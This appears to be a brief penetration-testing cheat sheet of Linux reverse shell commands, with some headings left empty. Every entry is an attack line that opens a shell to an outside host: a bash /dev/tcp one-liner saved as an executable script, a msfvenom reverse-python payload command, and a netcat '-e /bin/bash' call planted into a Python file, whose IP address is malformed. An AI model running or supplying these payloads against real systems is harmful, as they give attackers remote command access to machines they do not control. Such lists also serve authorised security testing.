Reverse shells
Linux Reverse shell
Linux
Python
or
echo 'bash -c "bash -i >& /dev/tcp/192.168.119.146/4444 0>&1"' > /tmp/shell.sh
chmod +x /tmp/shell.sh
msfvenom -p cmd/unix/reverse_python lhost=10.10.16.1 lport=9999 R
echo "import os; gori='nc 10.10.10.01. 8888 -e /bin/bash'; os.system(gori)" > vulnerablefile.py
Last updated